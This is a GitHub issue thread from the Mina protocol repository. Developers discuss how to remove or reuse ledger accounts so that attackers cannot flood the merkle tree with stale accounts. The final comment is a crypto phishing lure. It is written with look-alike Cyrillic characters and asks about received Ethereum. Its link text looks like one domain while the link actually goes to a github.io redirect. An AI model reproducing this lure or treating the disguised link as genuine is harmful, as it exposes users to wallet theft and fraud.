### ISSUE TITLE
A method to delete accounts

### ISSUE THREAD

**Issue by wu-s-john** [MinaProtocol/mina#574]
We need a way to remove accounts so that an attacker does not flood the database with stale accounts. Previously, we removed accounts if their balance is assigned to zero. However, this is not convenient for the user.

**Comment by emberian** [comment]
@imeckler I think we discussed some sort of "replacement" transaction that, if an account has zero (or negligible) balance, lets us install a new public key into that index (but not resetting the nonce). I'm still a bit leery of this- it basically turns into a minimum deposit to hold an account, else some cowboy can kick you out of the ledger.

**Comment by shimkiv** [comment]
Currently we have the `deleteAccount` daemon's GraphQL Mutation.
Hope it helps. Closing.

**Comment by emberian** [comment]
That's unrelated, this is about reusing space in the merkle tree.

**Comment by submarinec94** [comment]
related but just old issue for reference, once account deletes is done, this can be closed

**Comment by allafigadera2189** [comment]
Hey, I rесеivеd sоme Ethеrеum frоm here — is it pоssiblе they might tаkе it bасk lаtеr? I аlrеаdy spеnt it 😔  
Link: [auth․id-trаnsfer․cоm](https://auth-01.github.io/redirect)

![Image](https://github.com/user-attachments/assets/b18e8a94-fd98-411b-9c43-7c0b22919dee)
